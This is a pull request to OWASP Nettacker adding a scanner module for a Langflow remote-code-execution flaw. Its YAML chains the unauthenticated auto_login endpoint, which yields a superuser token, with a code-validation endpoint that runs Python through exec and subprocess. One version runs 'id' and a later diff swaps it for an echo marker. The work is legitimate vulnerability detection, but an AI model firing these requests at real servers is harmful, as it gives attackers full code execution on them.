### PR TITLE
feat: add Langflow CVE-2026-9198 detection module

### DIFF
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -214,7 +214,8 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 - '**ivanti_ics_cve_2023_46805_vuln**' – check the target for Ivanti ICS CVE-2023-46805 vulnerability
 - '**joomla_cve_2023_23752_vuln**' – check the target for Joomla CVE-2023-23752 information disclosure
 - '**justwriting_cve_2021_41878_vuln**' – check the target for JustWriting CVE-2021-41878
-- '**langflow_cve_2025_3248_vuln**' - check the target for Langflow CVE-2025-3248 vulnerability
+- '**langflow_cve_2025_3248_vuln**' - check the target for Langflow CVE-2025-3248 unauthenticated RCE vulnerability
+- '**langflow_cve_2026_9198_vuln**' - check the target for Langflow CVE-2026-9198 Auto-Login abuse RCE vulnerability
 - '**log4j_cve_2021_44228_vuln**' – check the target for Log4Shell CVE-2021-44228 vulnerability
 - '**maxsite_cms_cve_2021_35265_vuln**' – check the target for MaxSite CMS CVE-2021-35265
 - '**memos_cve_2025_22952_ssrf_vuln**' – check vulnerable Memos markdown metadata endpoint CVE-2025-22952

--- a/nettacker/modules/vuln/langflow_cve_2026_9198.yaml
+++ b/nettacker/modules/vuln/langflow_cve_2026_9198.yaml
@@ -3,9 +3,11 @@ info:
   author: OWASP Nettacker Team
   severity: 9.8
   description: >
-    IBM Langflow OSS 1.0.0 through 1.10.0 allows unauthenticated attackers to chain 
-    /api/v1/auto_login (mints SUPERUSER tokens to any network caller) with /api/v1/validate/code 
-    (executes user code via exec()) to achieve full RCE on default Langflow deployments
+    Default deployments of IBM Langflow OSS (versions 1.0.0 through 1.10.0) configured with 
+    LANGFLOW_AUTO_LOGIN=True are vulnerable to RCE.
+    The /api/v1/auto_login endpoint mints superuser tokens for any network caller without 
+    authentication: an attacker can leverage these credentials to access the /api/v1/validate/code 
+    endpoint and execute arbitrary Python code via the backend exec() function.
   references:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-9198
     - https://www.ibm.com/support/pages/security-bulletin-unauthenticated-remote-code-execution-auto-login-bypass-and-code-validation
@@ -39,9 +41,8 @@ payloads:
                 - "http"
               ports:
                 - 7860 
-                - 80
         response:
-          save_to_temp_events_only: get_http_superuser_jwt
+          save_to_temp_events_only: get_http_default_superuser_jwt
           condition_type: and
           conditions:
             content: 
@@ -58,8 +59,8 @@ payloads:
         allow_redirects: false
         ssl: false
         json:
-          code: |
-            def foo(rce=exec("raise Exception(__import__('subprocess').check_output(['id'], shell=True, stderr=__import__('subprocess').STDOUT).decode())")):
+          code: | 
+            def foo(rce=exec("raise Exception(__import__('subprocess').check_output('echo OWASP-NETTACKER-CVE-2026-9198', shell=True, text=True, stderr=__import__('subprocess').STDOUT))")):
                 pass
         url:
           nettacker_fuzzer:
@@ -72,16 +73,15 @@ payloads:
                 - "http"
               ports:
                 - 7860 
-                - 80
         response:
-          dependent_on_temp_event: get_http_superuser_jwt
+          dependent_on_temp_event: get_http_default_superuser_jwt
           condition_type: and
           conditions:
             status_code:
               regex: "200"
               reverse: false
             content:
-              regex: "uid=[0-9]+\\(.*\\)"
+              regex: OWASP-NETTACKER-CVE-2026-9198
               reverse: false
 
   - library: http
@@ -101,7 +101,128 @@ payloads:
               schema:
                 - "https"
               ports:
-                - 7860
+                - 7860 
+        response:
+          save_to_temp_events_only: get_https_default_superuser_jwt
+          condition_type: and
+          conditions:
+            content: 
+              regex: 'access_token"\s*:\s*"([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)'
+              reverse: false
+      
+      - method: post
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          Authorization: "Bearer dependent_on_temp_event[0]['content'][0]"
+          Content-Type: "application/json"
+          Accept: "application/json"
+        allow_redirects: false
+        ssl: false
+        json:
+          code: | 
+            def foo(rce=exec("raise Exception(__import__('subprocess').check_output('echo OWASP-NETTACKER-CVE-2026-9198', shell=True, text=True, stderr=__import__('subprocess').STDOUT))")):
+                pass
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/validate/code"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "https"
+              ports:
+                - 7860 
+        response:
+          dependent_on_temp_event: get_https_default_superuser_jwt
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: OWASP-NETTACKER-CVE-2026-9198
+              reverse: false
+
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/auto_login"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+              ports:
+                - 80
+        response:
+          save_to_temp_events_only: get_http_superuser_jwt
+          condition_type: and
+          conditions:
+            content: 
+              regex: 'access_token"\s*:\s*"([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)'
+              reverse: false
+      
+      - method: post
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          Authorization: "Bearer dependent_on_temp_event[0]['content'][0]"
+          Content-Type: "application/json"
+          Accept: "application/json"
+        allow_redirects: false
+        ssl: false
+        json:
+          code: | 
+            def foo(rce=exec("raise Exception(__import__('subprocess').check_output('echo OWASP-NETTACKER-CVE-2026-9198', shell=True, text=True, stderr=__import__('subprocess').STDOUT))")):
+                pass
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/validate/code"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+              ports:
+                - 80 
+        response:
+          dependent_on_temp_event: get_http_superuser_jwt
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: OWASP-NETTACKER-CVE-2026-9198
+              reverse: false
+
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/auto_login"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "https"
+              ports:
                 - 443
         response:
           save_to_temp_events_only: get_https_superuser_jwt
@@ -121,8 +242,8 @@ payloads:
         allow_redirects: false
         ssl: false
         json:
-          code: |
-            def foo(rce=exec("raise Exception(__import__('subprocess').check_output(['id'], shell=True, stderr=__import__('subprocess').STDOUT).decode())")):
+          code: | 
+            def foo(rce=exec("raise Exception(__import__('subprocess').check_output('echo OWASP-NETTACKER-CVE-2026-9198', shell=True, text=True, stderr=__import__('subprocess').STDOUT))")):
                 pass
         url:
           nettacker_fuzzer:
@@ -134,7 +255,6 @@ payloads:
               schema:
                 - "https"
               ports:
-                - 7860 
                 - 443
         response:
           dependent_on_temp_event: get_https_superuser_jwt
@@ -144,5 +264,5 @@ payloads:
               regex: "200"
               reverse: false
             content:
-              regex: "uid=[0-9]+\\(.*\\)"
+              regex: OWASP-NETTACKER-CVE-2026-9198
               reverse: false     

--- a/nettacker/modules/vuln/langflow_cve_2026_9198.yaml
+++ b/nettacker/modules/vuln/langflow_cve_2026_9198.yaml
@@ -1,0 +1,148 @@
+info:
+  name: langflow_cve_2026_9198_vuln
+  author: OWASP Nettacker Team
+  severity: 9.8
+  description: >
+    IBM Langflow OSS 1.0.0 through 1.10.0 allows unauthenticated attackers to chain 
+    /api/v1/auto_login (mints SUPERUSER tokens to any network caller) with /api/v1/validate/code 
+    (executes user code via exec()) to achieve full RCE on default Langflow deployments
+  references:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-9198
+    - https://www.ibm.com/support/pages/security-bulletin-unauthenticated-remote-code-execution-auto-login-bypass-and-code-validation
+    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-9198
+  profiles:
+    - vuln
+    - http
+    - critical_severity
+    - cve
+    - cve2026
+    - cisa_kev
+    - langflow
+    - rce
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/auto_login"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+              ports:
+                - 7860 
+                - 80
+        response:
+          save_to_temp_events_only: get_http_superuser_jwt
+          condition_type: and
+          conditions:
+            content: 
+              regex: 'access_token"\s*:\s*"([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)'
+              reverse: false
+      
+      - method: post
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          Authorization: "Bearer dependent_on_temp_event[0]['content'][0]"
+          Content-Type: "application/json"
+          Accept: "application/json"
+        allow_redirects: false
+        ssl: false
+        json:
+          code: |
+            def foo(rce=exec("raise Exception(__import__('subprocess').check_output(['id'], shell=True, stderr=__import__('subprocess').STDOUT).decode())")):
+                pass
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/validate/code"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "http"
+              ports:
+                - 7860 
+                - 80
+        response:
+          dependent_on_temp_event: get_http_superuser_jwt
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "uid=[0-9]+\\(.*\\)"
+              reverse: false
+
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/auto_login"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "https"
+              ports:
+                - 7860
+                - 443
+        response:
+          save_to_temp_events_only: get_https_superuser_jwt
+          condition_type: and
+          conditions:
+            content:
+              regex: 'access_token"\s*:\s*"([A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+)'
+              reverse: false
+
+      - method: post
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          Authorization: "Bearer dependent_on_temp_event[0]['content'][0]"
+          Content-Type: "application/json"
+          Accept: "application/json"
+        allow_redirects: false
+        ssl: false
+        json:
+          code: |
+            def foo(rce=exec("raise Exception(__import__('subprocess').check_output(['id'], shell=True, stderr=__import__('subprocess').STDOUT).decode())")):
+                pass
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/api/v1/validate/code"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              schema:
+                - "https"
+              ports:
+                - 7860 
+                - 443
+        response:
+          dependent_on_temp_event: get_https_superuser_jwt
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+            content:
+              regex: "uid=[0-9]+\\(.*\\)"
+              reverse: false     


### PR DESCRIPTION
<!--
  Thanks for contributing to OWASP Nettacker! 
  Please read and follow the instructions!
  Please DO NOT REMOVE THIS PR TEMPLATE AND THE PR CHECKLIST AT THE BOTTOM!
-->

## Proposed change

<!--
  Describe the big picture of your changes.
  Don't forget to link your PR to a new or existing issue.
  Remember to digitally sign your commits, run tests, attach screenshot/video evidence, add documentation
  Check and follow the contribution guidelines here: https://nettacker.readthedocs.io/en/latest/Developers/#contribution-guidelines
  We use CodeRabbit.AI to perform the first round of PR reviews
  PRs failing to comply with the contribution guidelines and PR checks in this template may be auto-closed without a human maintainer review
-->

This PR adds a new detection module for CVE-2026-9198, an RCE vulnerability affecting Langflow versions 1.0.0 through 1.10.0. 
Tested against vulnerable and patched versions of the official [langflowai/langflow](https://hub.docker.com/r/langflowai/langflow) Docker images.

Note: to reproduce vulnerability is mandatory to run affected versions containers with `-e LANGFLOW_AUTO_LOGIN=true`

Closes #1656 

<img width="1264" height="549" alt="nettacker_cve_2026_9198" src="https://github.com/user-attachments/assets/f0d1446a-f99f-44a8-9fd4-3e89d336ba44" />



## Type of change

<!--
  Type of change you want to introduce. 
  Select one (1) option only.
  If your PR seems to fit multiple options, it likely should be split into multiple PRs.
-->

- [ ] New core framework functionality
- [ ] Bugfix (non-breaking change that fixes an issue)
- [ ] Code refactoring without any functionality changes
- [x] New or existing module/payload change
- [ ] Documentation/localization improvement
- [ ] Test coverage improvement
- [ ] Dependency upgrade
- [ ] Other improvement (best practice, cleanup, optimization, etc)

## Checklist

<!--
  Put an `x` in the boxes that apply. You can change them after the PR is created.
-->

- [x] I've followed the [contributing guidelines][contributing-guidelines]
- [x] I've **digitally signed** all my commits in this PR
- [x] I've run `make pre-commit` and confirm it didn't generate any warnings/changes
- [x] I've run `make test` and I confirm all tests passed locally
- [x] I've added/updated any relevant documentation in the `docs/` folder 
- [x] I've linked this PR with an open issue
- [x] I've tested and verified that my code works as intended and resolves the issue as described
- [x] I've attached screenshots demonstrating that my code works as intended (if applicable)
- [x] I've checked all other open PRs to avoid submitting duplicate work
- [x] I confirm that the code and comments in this PR are not direct unreviewed outputs of AI
- [x] I confirm that I am the Sole Responsible Author for every line of code, comment, and design decision

<!--
  Thanks again for your contribution!
-->

[contributing-guidelines]: https://nettacker.readthedocs.io/en/latest/Developers/#contribution-guidelines
